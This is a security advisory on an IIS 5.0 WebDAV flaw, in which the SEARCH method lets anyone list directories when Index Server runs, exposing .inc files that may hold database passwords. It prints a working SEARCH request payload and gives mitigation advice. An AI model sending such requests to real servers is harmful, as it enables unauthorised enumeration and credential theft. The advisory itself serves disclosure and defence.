COMMAND
IIS
SYSTEMS AFFECTED
IIS 5.0
PROBLEM
Following is based on a @stake Advisory by mnemonix. Microsoft's
Internet Information Server 5.0 is WebDAV (RFC 2518) enabled. As
part of the extra functionality provided by the WebDAV components.
Microsoft has introduced the SEARCH request method to enable
searching for files based upon certain criteria. This
functionality can be exploited to gain what are equivalent to
directory listings. These directory listings can be used by an
attacker to locate files in the web directories that are not
normally exposed through links on the web site. .inc files and
other components of ASP applications that potentially contain
sensitive information can be viewed this way.
For a SEARCH request to succeed the Index Service must be running
and read access must be given to the directory being searched. By
default all directories are indexed, however, by default, the
Index Service is not started.
Therefore those at risk from this particular issue are those
running IIS 5.0 with the Index Server service running.
By making a request similar to:
SEARCH / HTTP/1.1
Host: 127.0.0.1
Content-Type: text/xml
Content-Length: 133
<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>
It is possible to gain a directory listing of the root directory
and every sub-directory. The impact of this is such that
attackers may be able to discover "hidden" files or enumerate .inc
files used in ASP applications and then directly download them.
.inc files can contain sensitive information such as database
login names and passwords.
SOLUTION
If you don't use the Index Server service then it should be
disabled. This will prevent this issue. If you do use it place
any files that may be considered as sensitive in a directory that
is not indexed or that has had the read permission removed from
it.
Microsoft has written a KB article about this issue. More can be
found at:
http://www.microsoft.com/technet/support/kb.asp?ID=272079